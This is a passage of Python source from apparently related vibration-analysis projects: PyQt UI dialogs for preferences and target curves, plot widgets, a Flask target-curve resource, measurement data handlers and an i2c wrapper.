QThreadPool.globalInstance().start(p, priority=-1)
logger.info(f"Saved snapshot in {to_millis(start, time.time())}ms")
class SetPreference(QRunnable):
def __init__(self, prefs, key, val):
super().__init__()
self.prefs = prefs
self.key = key
self.val = val
def run(self):
start = time.time()
self.prefs.set(self.key, np_to_str(self.val))
logger.info(f"Set preference in {to_millis(start, time.time())}ms")
def make_app():
app = QApplication(sys.argv)
if getattr(sys, 'frozen', False):
icon_path = os.path.join(sys._MEIPASS, 'Icon.ico')
else:
icon_path = os.path.abspath(os.path.join(os.path.dirname('__file__'), '../icons/Icon.ico'))
if os.path.exists(icon_path):
app.setWindowIcon(QIcon(icon_path))
return app, Preferences(QSettings("3ll3d00d", "qvibe-analyser"))
if __name__ == '__main__':
app, prefs = make_app()
form = QVibe(app, prefs)
# setup the error handler
e_dialog = QErrorMessage(form)
e_dialog.setWindowModality(QtCore.Qt.WindowModal)
font = QFont()
font.setFamily("Consolas")
font.setPointSize(8)
e_dialog.setFont(font)
# add the exception handler so we can see the errors in a QErrorMessage
sys._excepthook = sys.excepthook
def dump_exception_to_log(exctype, value, tb):
import traceback
print(exctype, value, tb)
global e_dialog
if e_dialog is not None:
formatted = traceback.format_exception(etype=exctype, value=value, tb=tb)
e_dialog.setWindowTitle('Unexpected Error')
url = 'https://github.com/3ll3d00d/qvibe-analyser/issues/new'
msg = f"Unexpected Error detected, go to {url} to log the issue<p>{'<br>'.join(formatted)}"
e_dialog.showMessage(msg)
e_dialog.resize(1200, 400)
sys.excepthook = dump_exception_to_log
# show the form and exec the app
form.show()
app.exec_()
class PlotWidgetForSpectrum(pg.PlotWidget):
def __init__(self, parent=None, background='default', **kargs):
super().__init__(parent=parent,
background=background,
axisItems={
'bottom': MinorLevelsAxisItem(orientation='bottom'),
'left': MinorLevelsAxisItem(orientation='left')
},
**kargs)
class PlotWidgetWithDateAxis(pg.PlotWidget):
def __init__(self, parent=None, background='default', **kargs):
super().__init__(parent=parent,
background=background,
axisItems={
'bottom': TimeAxisItem(orientation='bottom'),
'left': MinorLevelsAxisItem(orientation='left')
},
**kargs)
class PlotWidgetForSpectrogram(pg.PlotWidget):
def __init__(self, parent=None, background='default', **kargs):
super().__init__(parent=parent,
background=background,
axisItems={'left': Inverse(orientation='left')},
**kargs)
class Inverse(pg.AxisItem):
def __init__(self, *args, **kwargs):
super(Inverse, self).__init__(*args, **kwargs)
def tickStrings(self, values, scale, spacing):
return values[::-1]
class MinorLevelsAxisItem(pg.AxisItem):
def tickSpacing(self, minVal, maxVal, size):
return bump_tick_levels(super(), minVal, maxVal, size)
class TimeAxisItem(MinorLevelsAxisItem):
def tickStrings(self, values, scale, spacing):
import datetime
return [str(datetime.timedelta(seconds=value)).split('.')[0] for value in values]
```
#### File: python/ui/preferences.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_preferencesDialog(object):
def setupUi(self, preferencesDialog):
preferencesDialog.setObjectName("preferencesDialog")
preferencesDialog.resize(490, 426)
self.verticalLayout = QtWidgets.QVBoxLayout(preferencesDialog)
self.verticalLayout.setObjectName("verticalLayout")
self.panes = QtWidgets.QVBoxLayout()
self.panes.setObjectName("panes")
self.userLayout = QtWidgets.QGridLayout()
self.userLayout.setObjectName("userLayout")
self.wavSaveDirLabel = QtWidgets.QLabel(preferencesDialog)
self.wavSaveDirLabel.setObjectName("wavSaveDirLabel")
self.userLayout.addWidget(self.wavSaveDirLabel, 1, 0, 1, 1)
self.wavSaveDirPicker = QtWidgets.QToolButton(preferencesDialog)
self.wavSaveDirPicker.setObjectName("wavSaveDirPicker")
self.userLayout.addWidget(self.wavSaveDirPicker, 1, 2, 1, 1)
self.wavSaveDir = QtWidgets.QLineEdit(preferencesDialog)
self.wavSaveDir.setReadOnly(True)
self.wavSaveDir.setObjectName("wavSaveDir")
self.userLayout.addWidget(self.wavSaveDir, 1, 1, 1, 1)
self.userLayoutLabel = QtWidgets.QLabel(preferencesDialog)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.userLayoutLabel.setFont(font)
self.userLayoutLabel.setFrameShape(QtWidgets.QFrame.Box)
self.userLayoutLabel.setFrameShadow(QtWidgets.QFrame.Sunken)
self.userLayoutLabel.setAlignment(QtCore.Qt.AlignCenter)
self.userLayoutLabel.setObjectName("userLayoutLabel")
self.userLayout.addWidget(self.userLayoutLabel, 0, 0, 1, 3)
self.panes.addLayout(self.userLayout)
self.displayPane = QtWidgets.QGridLayout()
self.displayPane.setObjectName("displayPane")
self.rtaLabel = QtWidgets.QLabel(preferencesDialog)
self.rtaLabel.setObjectName("rtaLabel")
self.displayPane.addWidget(self.rtaLabel, 1, 0, 1, 1)
self.displayLayoutLabel = QtWidgets.QLabel(preferencesDialog)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.displayLayoutLabel.setFont(font)
self.displayLayoutLabel.setFrameShape(QtWidgets.QFrame.Box)
self.displayLayoutLabel.setFrameShadow(QtWidgets.QFrame.Sunken)
self.displayLayoutLabel.setAlignment(QtCore.Qt.AlignCenter)
self.displayLayoutLabel.setObjectName("displayLayoutLabel")
self.displayPane.addWidget(self.displayLayoutLabel, 0, 0, 1, 3)
self.targetLabel = QtWidgets.QLabel(preferencesDialog)
self.targetLabel.setObjectName("targetLabel")
self.displayPane.addWidget(self.targetLabel, 1, 1, 1, 1)
self.spectroScaleFactor = QtWidgets.QComboBox(preferencesDialog)
self.spectroScaleFactor.setObjectName("spectroScaleFactor")
self.spectroScaleFactor.addItem("")
self.spectroScaleFactor.addItem("")
self.spectroScaleFactor.addItem("")
self.spectroScaleFactor.addItem("")
self.spectroScaleFactor.addItem("")
self.spectroScaleFactor.addItem("")
self.displayPane.addWidget(self.spectroScaleFactor, 2, 2, 1, 1)
self.spectroScaleLabel = QtWidgets.QLabel(preferencesDialog)
self.spectroScaleLabel.setObjectName("spectroScaleLabel")
self.displayPane.addWidget(self.spectroScaleLabel, 2, 0, 2, 1)
self.spectroScaleAlgoLabel = QtWidgets.QLabel(preferencesDialog)
self.spectroScaleAlgoLabel.setObjectName("spectroScaleAlgoLabel")
self.displayPane.addWidget(self.spectroScaleAlgoLabel, 3, 1, 1, 1)
self.spectroScaleFactorLabel = QtWidgets.QLabel(preferencesDialog)
self.spectroScaleFactorLabel.setObjectName("spectroScaleFactorLabel")
self.displayPane.addWidget(self.spectroScaleFactorLabel, 2, 1, 1, 1)
self.targetLayout = QtWidgets.QHBoxLayout()
self.targetLayout.setObjectName("targetLayout")
self.loadTarget = QtWidgets.QToolButton(preferencesDialog)
self.loadTarget.setObjectName("loadTarget")
self.targetLayout.addWidget(self.loadTarget)
self.clearTarget = QtWidgets.QToolButton(preferencesDialog)
self.clearTarget.setObjectName("clearTarget")
self.targetLayout.addWidget(self.clearTarget)
self.createTarget = QtWidgets.QToolButton(preferencesDialog)
self.createTarget.setObjectName("createTarget")
self.targetLayout.addWidget(self.createTarget)
self.targetSet = QtWidgets.QCheckBox(preferencesDialog)
self.targetSet.setEnabled(False)
self.targetSet.setObjectName("targetSet")
self.targetLayout.addWidget(self.targetSet)
self.displayPane.addLayout(self.targetLayout, 1, 2, 1, 1)
self.spectroScaleAlgo = QtWidgets.QComboBox(preferencesDialog)
self.spectroScaleAlgo.setObjectName("spectroScaleAlgo")
self.spectroScaleAlgo.addItem("")
self.spectroScaleAlgo.addItem("")
self.spectroScaleAlgo.addItem("")
self.spectroScaleAlgo.addItem("")
self.spectroScaleAlgo.addItem("")
self.displayPane.addWidget(self.spectroScaleAlgo, 3, 2, 1, 1)
self.displayPane.setColumnStretch(2, 1)
self.panes.addLayout(self.displayPane)
self.analysisPane = QtWidgets.QGridLayout()
self.analysisPane.setObjectName("analysisPane")
self.zScaleLabel = QtWidgets.QLabel(preferencesDialog)
self.zScaleLabel.setObjectName("zScaleLabel")
self.analysisPane.addWidget(self.zScaleLabel, 1, 4, 1, 1)
self.xScale = QtWidgets.QDoubleSpinBox(preferencesDialog)
self.xScale.setObjectName("xScale")
self.analysisPane.addWidget(self.xScale, 1, 1, 1, 1)
self.magMin = QtWidgets.QSpinBox(preferencesDialog)
self.magMin.setMaximum(150)
self.magMin.setObjectName("magMin")
self.analysisPane.addWidget(self.magMin, 2, 1, 1, 1)
self.xScaleLabel = QtWidgets.QLabel(preferencesDialog)
self.xScaleLabel.setObjectName("xScaleLabel")
self.analysisPane.addWidget(self.xScaleLabel, 1, 0, 1, 1)
self.analysisLayoutLabel = QtWidgets.QLabel(preferencesDialog)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.analysisLayoutLabel.setFont(font)
self.analysisLayoutLabel.setFrameShape(QtWidgets.QFrame.Box)
self.analysisLayoutLabel.setFrameShadow(QtWidgets.QFrame.Sunken)
self.analysisLayoutLabel.setAlignment(QtCore.Qt.AlignCenter)
self.analysisLayoutLabel.setObjectName("analysisLayoutLabel")
self.analysisPane.addWidget(self.analysisLayoutLabel, 0, 0, 1, 6)
self.magMaxLabel = QtWidgets.QLabel(preferencesDialog)
self.magMaxLabel.setObjectName("magMaxLabel")
self.analysisPane.addWidget(self.magMaxLabel, 2, 2, 1, 1)
self.yScale = QtWidgets.QDoubleSpinBox(preferencesDialog)
self.yScale.setObjectName("yScale")
self.analysisPane.addWidget(self.yScale, 1, 3, 1, 1)
self.zScale = QtWidgets.QDoubleSpinBox(preferencesDialog)
self.zScale.setObjectName("zScale")
self.analysisPane.addWidget(self.zScale, 1, 5, 1, 1)
self.yScaleLabel = QtWidgets.QLabel(preferencesDialog)
self.yScaleLabel.setObjectName("yScaleLabel")
self.analysisPane.addWidget(self.yScaleLabel, 1, 2, 1, 1)
self.maxMinLabel = QtWidgets.QLabel(preferencesDialog)
self.maxMinLabel.setObjectName("maxMinLabel")
self.analysisPane.addWidget(self.maxMinLabel, 2, 0, 1, 1)
self.magMax = QtWidgets.QSpinBox(preferencesDialog)
self.magMax.setMaximum(150)
self.magMax.setProperty("value", 150)
self.magMax.setObjectName("magMax")
self.analysisPane.addWidget(self.magMax, 2, 3, 1, 1)
self.freqMinLabel = QtWidgets.QLabel(preferencesDialog)
self.freqMinLabel.setObjectName("freqMinLabel")
self.analysisPane.addWidget(self.freqMinLabel, 3, 0, 1, 1)
self.freqMaxLabel = QtWidgets.QLabel(preferencesDialog)
self.freqMaxLabel.setObjectName("freqMaxLabel")
self.analysisPane.addWidget(self.freqMaxLabel, 3, 2, 1, 1)
self.freqMin = QtWidgets.QSpinBox(preferencesDialog)
self.freqMin.setMinimum(0)
self.freqMin.setMaximum(1000)
self.freqMin.setProperty("value", 0)
self.freqMin.setObjectName("freqMin")
self.analysisPane.addWidget(self.freqMin, 3, 1, 1, 1)
self.freqMax = QtWidgets.QSpinBox(preferencesDialog)
self.freqMax.setMinimum(1)
self.freqMax.setMaximum(1000)
self.freqMax.setProperty("value", 125)
self.freqMax.setObjectName("freqMax")
self.analysisPane.addWidget(self.freqMax, 3, 3, 1, 1)
self.detrendLabel = QtWidgets.QLabel(preferencesDialog)
self.detrendLabel.setObjectName("detrendLabel")
self.analysisPane.addWidget(self.detrendLabel, 2, 4, 1, 1)
self.detrend = QtWidgets.QComboBox(preferencesDialog)
self.detrend.setObjectName("detrend")
self.detrend.addItem("")
self.detrend.addItem("")
self.detrend.addItem("")
self.analysisPane.addWidget(self.detrend, 2, 5, 1, 1)
self.highpassRTA = QtWidgets.QCheckBox(preferencesDialog)
self.highpassRTA.setObjectName("highpassRTA")
self.analysisPane.addWidget(self.highpassRTA, 3, 4, 1, 2)
self.panes.addLayout(self.analysisPane)
self.recordersPane = QtWidgets.QGridLayout()
self.recordersPane.setObjectName("recordersPane")
self.recorderIP = QtWidgets.QLineEdit(preferencesDialog)
self.recorderIP.setObjectName("recorderIP")
self.recordersPane.addWidget(self.recorderIP, 1, 1, 1, 1)
self.deleteRecorderButton = QtWidgets.QToolButton(preferencesDialog)
self.deleteRecorderButton.setObjectName("deleteRecorderButton")
self.recordersPane.addWidget(self.deleteRecorderButton, 2, 2, 1, 1)
self.ipAddressLabel = QtWidgets.QLabel(preferencesDialog)
self.ipAddressLabel.setObjectName("ipAddressLabel")
self.recordersPane.addWidget(self.ipAddressLabel, 1, 0, 2, 1)
self.analysisLayoutLabel1 = QtWidgets.QLabel(preferencesDialog)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.analysisLayoutLabel1.setFont(font)
self.analysisLayoutLabel1.setFrameShape(QtWidgets.QFrame.Box)
self.analysisLayoutLabel1.setFrameShadow(QtWidgets.QFrame.Sunken)
self.analysisLayoutLabel1.setAlignment(QtCore.Qt.AlignCenter)
self.analysisLayoutLabel1.setObjectName("analysisLayoutLabel1")
self.recordersPane.addWidget(self.analysisLayoutLabel1, 0, 0, 1, 3)
self.recorders = QtWidgets.QComboBox(preferencesDialog)
self.recorders.setObjectName("recorders")
self.recordersPane.addWidget(self.recorders, 2, 1, 1, 1)
self.addRecorderButton = QtWidgets.QToolButton(preferencesDialog)
self.addRecorderButton.setObjectName("addRecorderButton")
self.recordersPane.addWidget(self.addRecorderButton, 1, 2, 1, 1)
self.panes.addLayout(self.recordersPane)
self.systemPane = QtWidgets.QGridLayout()
self.systemPane.setObjectName("systemPane")
self.checkForUpdates = QtWidgets.QCheckBox(preferencesDialog)
self.checkForUpdates.setChecked(True)
self.checkForUpdates.setObjectName("checkForUpdates")
self.systemPane.addWidget(self.checkForUpdates, 1, 0, 1, 1)
self.checkForBetaUpdates = QtWidgets.QCheckBox(preferencesDialog)
self.checkForBetaUpdates.setObjectName("checkForBetaUpdates")
self.systemPane.addWidget(self.checkForBetaUpdates, 1, 1, 1, 1)
self.systemLayoutLabel = QtWidgets.QLabel(preferencesDialog)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.systemLayoutLabel.setFont(font)
self.systemLayoutLabel.setFrameShape(QtWidgets.QFrame.Box)
self.systemLayoutLabel.setFrameShadow(QtWidgets.QFrame.Sunken)
self.systemLayoutLabel.setAlignment(QtCore.Qt.AlignCenter)
self.systemLayoutLabel.setObjectName("systemLayoutLabel")
self.systemPane.addWidget(self.systemLayoutLabel, 0, 0, 1, 2)
self.panes.addLayout(self.systemPane)
self.verticalLayout.addLayout(self.panes)
self.buttonBox = QtWidgets.QDialogButtonBox(preferencesDialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.RestoreDefaults|QtWidgets.QDialogButtonBox.Save)
self.buttonBox.setObjectName("buttonBox")
self.verticalLayout.addWidget(self.buttonBox)
self.retranslateUi(preferencesDialog)
self.buttonBox.accepted.connect(preferencesDialog.accept)
self.buttonBox.rejected.connect(preferencesDialog.reject)
self.wavSaveDirPicker.clicked.connect(preferencesDialog.pick_save_dir)
self.recorderIP.textChanged['QString'].connect(preferencesDialog.validate_ip)
self.addRecorderButton.clicked.connect(preferencesDialog.add_recorder)
self.deleteRecorderButton.clicked.connect(preferencesDialog.delete_recorder)
self.clearTarget.clicked.connect(preferencesDialog.clear_target)
self.loadTarget.clicked.connect(preferencesDialog.load_target)
QtCore.QMetaObject.connectSlotsByName(preferencesDialog)
preferencesDialog.setTabOrder(self.wavSaveDir, self.wavSaveDirPicker)
preferencesDialog.setTabOrder(self.wavSaveDirPicker, self.xScale)
preferencesDialog.setTabOrder(self.xScale, self.yScale)
preferencesDialog.setTabOrder(self.yScale, self.zScale)
preferencesDialog.setTabOrder(self.zScale, self.magMin)
preferencesDialog.setTabOrder(self.magMin, self.magMax)
preferencesDialog.setTabOrder(self.magMax, self.freqMin)
preferencesDialog.setTabOrder(self.freqMin, self.freqMax)
preferencesDialog.setTabOrder(self.freqMax, self.recorderIP)
preferencesDialog.setTabOrder(self.recorderIP, self.addRecorderButton)
preferencesDialog.setTabOrder(self.addRecorderButton, self.recorders)
preferencesDialog.setTabOrder(self.recorders, self.deleteRecorderButton)
preferencesDialog.setTabOrder(self.deleteRecorderButton, self.checkForUpdates)
preferencesDialog.setTabOrder(self.checkForUpdates, self.checkForBetaUpdates)
def retranslateUi(self, preferencesDialog):
_translate = QtCore.QCoreApplication.translate
preferencesDialog.setWindowTitle(_translate("preferencesDialog", "Preferences"))
self.wavSaveDirLabel.setText(_translate("preferencesDialog", "Save Directory"))
self.wavSaveDirPicker.setText(_translate("preferencesDialog", "..."))
self.userLayoutLabel.setText(_translate("preferencesDialog", "Export"))
self.rtaLabel.setText(_translate("preferencesDialog", "RTA"))
self.displayLayoutLabel.setText(_translate("preferencesDialog", "Display"))
self.targetLabel.setText(_translate("preferencesDialog", "Target"))
self.spectroScaleFactor.setItemText(0, _translate("preferencesDialog", "1x"))
self.spectroScaleFactor.setItemText(1, _translate("preferencesDialog", "2x"))
self.spectroScaleFactor.setItemText(2, _translate("preferencesDialog", "4x"))
self.spectroScaleFactor.setItemText(3, _translate("preferencesDialog", "8x"))
self.spectroScaleFactor.setItemText(4, _translate("preferencesDialog", "16x"))
self.spectroScaleFactor.setItemText(5, _translate("preferencesDialog", "32x"))
self.spectroScaleLabel.setText(_translate("preferencesDialog", "Spectrogram"))
self.spectroScaleAlgoLabel.setText(_translate("preferencesDialog", "Algorithm"))
self.spectroScaleFactorLabel.setText(_translate("preferencesDialog", "Scale Factor"))
self.loadTarget.setText(_translate("preferencesDialog", "..."))
self.clearTarget.setText(_translate("preferencesDialog", "..."))
self.createTarget.setText(_translate("preferencesDialog", "..."))
self.targetSet.setText(_translate("preferencesDialog", "Set?"))
self.spectroScaleAlgo.setItemText(0, _translate("preferencesDialog", "Nearest"))
self.spectroScaleAlgo.setItemText(1, _translate("preferencesDialog", "Bilinear"))
self.spectroScaleAlgo.setItemText(2, _translate("preferencesDialog", "Hamming"))
self.spectroScaleAlgo.setItemText(3, _translate("preferencesDialog", "Bicubic"))
self.spectroScaleAlgo.setItemText(4, _translate("preferencesDialog", "Lanczos"))
self.zScaleLabel.setText(_translate("preferencesDialog", "z Scale"))
self.xScale.setSuffix(_translate("preferencesDialog", " x"))
self.magMin.setSuffix(_translate("preferencesDialog", " dB"))
self.xScaleLabel.setText(_translate("preferencesDialog", "x Scale"))
self.analysisLayoutLabel.setText(_translate("preferencesDialog", "Analysis"))
self.magMaxLabel.setText(_translate("preferencesDialog", "Max"))
self.yScale.setSuffix(_translate("preferencesDialog", " x"))
self.zScale.setSuffix(_translate("preferencesDialog", " x"))
self.yScaleLabel.setText(_translate("preferencesDialog", "y Scale"))
self.maxMinLabel.setText(_translate("preferencesDialog", "Magnitude Min"))
self.magMax.setSuffix(_translate("preferencesDialog", " dB"))
self.freqMinLabel.setText(_translate("preferencesDialog", "Frequency Min"))
self.freqMaxLabel.setText(_translate("preferencesDialog", "Max"))
self.freqMin.setSuffix(_translate("preferencesDialog", " Hz"))
self.freqMax.setSuffix(_translate("preferencesDialog", " Hz"))
self.detrendLabel.setText(_translate("preferencesDialog", "Detrend"))
self.detrend.setItemText(0, _translate("preferencesDialog", "None"))
self.detrend.setItemText(1, _translate("preferencesDialog", "Constant"))
self.detrend.setItemText(2, _translate("preferencesDialog", "Linear"))
self.highpassRTA.setText(_translate("preferencesDialog", "High pass RTA?"))
self.recorderIP.setInputMask(_translate("preferencesDialog", "000.000.000.000:00000"))
self.deleteRecorderButton.setText(_translate("preferencesDialog", "..."))
self.ipAddressLabel.setText(_translate("preferencesDialog", "Address"))
self.analysisLayoutLabel1.setText(_translate("preferencesDialog", "Recorders"))
self.addRecorderButton.setText(_translate("preferencesDialog", "..."))
self.checkForUpdates.setText(_translate("preferencesDialog", "Check for Updates on startup?"))
self.checkForBetaUpdates.setText(_translate("preferencesDialog", "Include Beta Versions?"))
self.systemLayoutLabel.setText(_translate("preferencesDialog", "System"))
```
#### File: python/ui/target.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_targetCurveDialog(object):
def setupUi(self, targetCurveDialog):
targetCurveDialog.setObjectName("targetCurveDialog")
targetCurveDialog.resize(754, 517)
self.gridLayout = QtWidgets.QGridLayout(targetCurveDialog)
self.gridLayout.setObjectName("gridLayout")
self.preview = PlotWidgetForSpectrum(targetCurveDialog)
self.preview.setObjectName("preview")
self.gridLayout.addWidget(self.preview, 3, 0, 1, 7)
self.magnitude = QtWidgets.QDoubleSpinBox(targetCurveDialog)
self.magnitude.setDecimals(1)
self.magnitude.setMinimum(-120.0)
self.magnitude.setMaximum(0.0)
self.magnitude.setSingleStep(0.1)
self.magnitude.setObjectName("magnitude")
self.gridLayout.addWidget(self.magnitude, 0, 3, 1, 1)
self.frequencyLabel = QtWidgets.QLabel(targetCurveDialog)
self.frequencyLabel.setObjectName("frequencyLabel")
self.gridLayout.addWidget(self.frequencyLabel, 0, 0, 1, 1)
self.magnitudeLabel = QtWidgets.QLabel(targetCurveDialog)
self.magnitudeLabel.setObjectName("magnitudeLabel")
self.gridLayout.addWidget(self.magnitudeLabel, 0, 2, 1, 1)
self.deleteHingeButton = QtWidgets.QToolButton(targetCurveDialog)
self.deleteHingeButton.setObjectName("deleteHingeButton")
self.gridLayout.addWidget(self.deleteHingeButton, 1, 4, 1, 1)
self.buttonBox = QtWidgets.QDialogButtonBox(targetCurveDialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Close|QtWidgets.QDialogButtonBox.Save)
self.buttonBox.setObjectName("buttonBox")
self.gridLayout.addWidget(self.buttonBox, 4, 6, 1, 1)
self.frequency = QtWidgets.QDoubleSpinBox(targetCurveDialog)
self.frequency.setDecimals(0)
self.frequency.setMaximum(24000.0)
self.frequency.setObjectName("frequency")
self.gridLayout.addWidget(self.frequency, 0, 1, 1, 1)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem, 0, 6, 1, 1)
self.hinges = QtWidgets.QComboBox(targetCurveDialog)
self.hinges.setObjectName("hinges")
self.gridLayout.addWidget(self.hinges, 1, 1, 1, 3)
self.label = QtWidgets.QLabel(targetCurveDialog)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 1, 0, 1, 1)
self.addHingeButton = QtWidgets.QToolButton(targetCurveDialog)
self.addHingeButton.setObjectName("addHingeButton")
self.gridLayout.addWidget(self.addHingeButton, 0, 4, 1, 1)
self.loadIsoTarget = QtWidgets.QPushButton(targetCurveDialog)
self.loadIsoTarget.setObjectName("loadIsoTarget")
self.gridLayout.addWidget(self.loadIsoTarget, 1, 5, 1, 1)
self.retranslateUi(targetCurveDialog)
self.buttonBox.accepted.connect(targetCurveDialog.accept)
self.buttonBox.rejected.connect(targetCurveDialog.reject)
QtCore.QMetaObject.connectSlotsByName(targetCurveDialog)
def retranslateUi(self, targetCurveDialog):
_translate = QtCore.QCoreApplication.translate
targetCurveDialog.setWindowTitle(_translate("targetCurveDialog", "Create Target Curve"))
self.frequencyLabel.setText(_translate("targetCurveDialog", "Frequency"))
self.magnitudeLabel.setText(_translate("targetCurveDialog", "Magnitude"))
self.deleteHingeButton.setText(_translate("targetCurveDialog", "..."))
self.label.setText(_translate("targetCurveDialog", "Hinge Points"))
self.addHingeButton.setText(_translate("targetCurveDialog", "..."))
self.loadIsoTarget.setText(_translate("targetCurveDialog", "Load IsoPerception"))
from qvibe import PlotWidgetForSpectrum
``` |
{
"source": "3ll3d00d/vibe",
"score": 3
} |
#### File: analyser/resources/target.py
```python
import logging
from flask import request
from flask_restful import Resource
logger = logging.getLogger('analyser.target')
class Target(Resource):
def __init__(self, **kwargs):
self._targetController = kwargs['targetController']
def get(self, targetId):
"""
Yields the analysed wav data.
:param targetId:
:return:
"""
result = self._targetController.analyse(targetId)
if result:
if len(result) == 2:
if result[1] == 404:
return result
else:
return {'name': targetId, 'data': self._jsonify(result)}, 200
else:
return None, 404
else:
return None, 500
def put(self, targetId):
"""
stores a new target.
:param targetId: the target to store.
:return:
"""
json = request.get_json()
if 'hinge' in json:
logger.info('Storing target ' + targetId)
if self._targetController.storeFromHinge(targetId, json['hinge']):
logger.info('Stored target ' + targetId)
return None, 200
else:
return None, 500
else:
return None, 400
def delete(self, targetId):
"""
deletes the specified target.
:param targetId:
:return:
"""
if self._targetController.delete(targetId):
return None, 200
else:
return None, 500
def _jsonify(self, tup):
return {'freq': tup[0].tolist(), 'val': tup[1].tolist()}
```
#### File: src/core/handler.py
```python
import abc
import csv
import datetime
import logging
import os
import threading
from queue import Queue, Empty
from flask import json
from core.httpclient import RequestsBasedHttpClient
from core.interface import DATETIME_FORMAT, API_PREFIX
class DataHandler:
"""
A simple interface to define the expected behaviour of something that handles data.
"""
@abc.abstractmethod
def start(self, measurementId):
"""
Initialises a handling session.
:param measurementId: the name of the measurement that is about to start.
:param converter: an optional converter to apply before the raw data is handled.
:return:
"""
pass
@abc.abstractmethod
def handle(self, data):
"""
A callback for handling some raw data.
:param data a list of dicts containing the sample data
:return:
"""
pass
@abc.abstractmethod
def stop(self, measurementId, failureReason=None):
"""
Allows for cleanup on end of measurement.
:param measurementId the measurement that is stopping.
:param failureReason the reason it failed if any, if None then it completed ok.
:return:
"""
pass
class Discarder(DataHandler):
"""
a data handler that simply throws the data away
"""
def start(self, measurementId):
pass
def handle(self, data):
pass
def stop(self, measurementId, failureReason=None):
pass
class CSVLogger(DataHandler):
"""
A handler which logs the received data to CSV into target/measurementId/loggerName/data.out
"""
def __init__(self, owner, name, target):
self.logger = logging.getLogger(owner + '.csvlogger')
self.name = name
self.target = target
self.started = False
self._csv = None
self._csvfile = None
self._first = True
def start(self, measurementId):
targetDir = os.path.join(self.target, measurementId, self.name)
if not os.path.exists(targetDir):
os.makedirs(targetDir, exist_ok=True)
targetPath = os.path.join(targetDir, 'data.out')
if os.path.exists(targetPath):
mode = 'w'
else:
mode = 'x'
self._csvfile = open(targetPath, mode=mode, newline='')
self._csv = csv.writer(self._csvfile)
self.started = True
self._first = True
def handle(self, data):
"""
Writes each sample to a csv file.
:param data: the samples.
:return:
"""
self.logger.debug("Handling " + str(len(data)) + " data items")
for datum in data:
if isinstance(datum, dict):
# these have to wrapped in a list for python 3.4 due to a change in the implementation
# of OrderedDict in python 3.5+ (which means .keys() and .values() are sequences in 3.5+)
if self._first:
self._csv.writerow(list(datum.keys()))
self._first = False
self._csv.writerow(list(datum.values()))
elif isinstance(datum, list):
self._csv.writerow(datum)
else:
self.logger.warning("Ignoring unsupported data type " + str(type(datum)) + " : " + str(datum))
def stop(self, measurementId, failureReason=None):
if self._csvfile is not None:
self.logger.debug("Closing csvfile for " + measurementId)
self._csvfile.close()
class AsyncHandler(DataHandler):
"""
A handler which hands the data off to another thread.
"""
def __init__(self, owner, delegate):
self.logger = logging.getLogger(owner + '.asynchandler')
self.name = "Async"
self.delegate = delegate
self.queue = Queue()
self.worker = None
self.working = False
self.stopping = False
def start(self, measurementId):
self.delegate.start(measurementId)
self.worker = threading.Thread(target=self.asyncHandle, daemon=True)
self.working = True
self.logger.info('Starting async handler for ' + measurementId)
self.worker.start()
def handle(self, data):
self.queue.put(data)
def stop(self, measurementId, failureReason=None):
# TODO do we need to link this stop to the status of the accelerometer
self.logger.info('Stopping async handler for ' + measurementId)
self.stopping = True
self.queue.join()
self.delegate.stop(measurementId, failureReason=failureReason)
self.logger.info('Stopped async handler for ' + measurementId)
self.working = False
def asyncHandle(self):
remaining = -1
while self.working:
try:
event = self.queue.get(timeout=1)
if event is not None:
self.delegate.handle(event)
self.queue.task_done()
if self.logger.isEnabledFor(logging.DEBUG):
self.logger.debug('async queue has ' + str(self.queue.qsize()) + ' items')
elif self.stopping:
if remaining == -1:
remaining = self.queue.qsize()
self.logger.info('Closing down asynchandler, ' + str(remaining) + ' items remaining')
remaining -= 1
except Empty:
pass
class HttpPoster(DataHandler):
"""
A handler which sends the data over http.
"""
def __init__(self, name, target, httpclient=RequestsBasedHttpClient()):
self.name = name
self.logger = logging.getLogger(name + '.httpposter')
self.httpclient = httpclient
self.target = target[:-1] if target.endswith('/') else target
self.deviceName = None
self.rootURL = self.target + API_PREFIX + '/measurements/'
self.sendURL = None
self.startResponseCode = None
self.dataResponseCode = []
self.endResponseCode = None
def start(self, measurementId):
"""
Posts to the target to tell it a named measurement is starting.
:param measurementId:
"""
self.sendURL = self.rootURL + measurementId + '/' + self.deviceName
self.startResponseCode = self._doPut(self.sendURL)
def _doPut(self, url, data=None):
formattedPayload = None if data is None else json.dumps(data, sort_keys=True)
try:
return self.httpclient.put(url, json=formattedPayload).status_code
except Exception as e:
self.logger.exception(e)
return 500
def handle(self, data):
"""
puts the data in the target.
:param data: the data to post.
:return:
"""
self.dataResponseCode.append(self._doPut(self.sendURL + '/data', data=data))
def stop(self, measurementId, failureReason=None):
"""
informs the target the named measurement has completed
:param measurementId: the measurement that has completed.
:return:
"""
if failureReason is None:
self.endResponseCode = self._doPut(self.sendURL + "/complete")
else:
self.endResponseCode = self._doPut(self.sendURL + "/failed", data={'failureReason': failureReason})
self.sendURL = None
# TODO verify that the response codes are all ok
```
#### File: recorder/common/i2c_io.py
```python
import abc
from queue import Queue
from .mpu6050 import mpu6050
class i2c_io(object):
"""
A thin wrapper on the smbus for reading and writing data. Exists to allow unit testing without a real device
connected.
"""
def __init__(self):
pass
"""
Writes data to the device.
:param: i2cAddress: the address to write to.
:param: register: the location to write to.
:param: val: the value to write.
"""
@abc.abstractmethod
def write(self, i2cAddress, register, val):
pass
"""
Reads data from the device.
:param: i2cAddress: the address to read from.
:param: register: the register to read from.
:return: the data read.
"""
@abc.abstractmethod
def read(self, i2cAddress, register):
pass
"""
Reads a block of data from the device.
:param: i2cAddress: the address to read from.
:param: register: the register to read from.
:param: length: no of bytes to read.
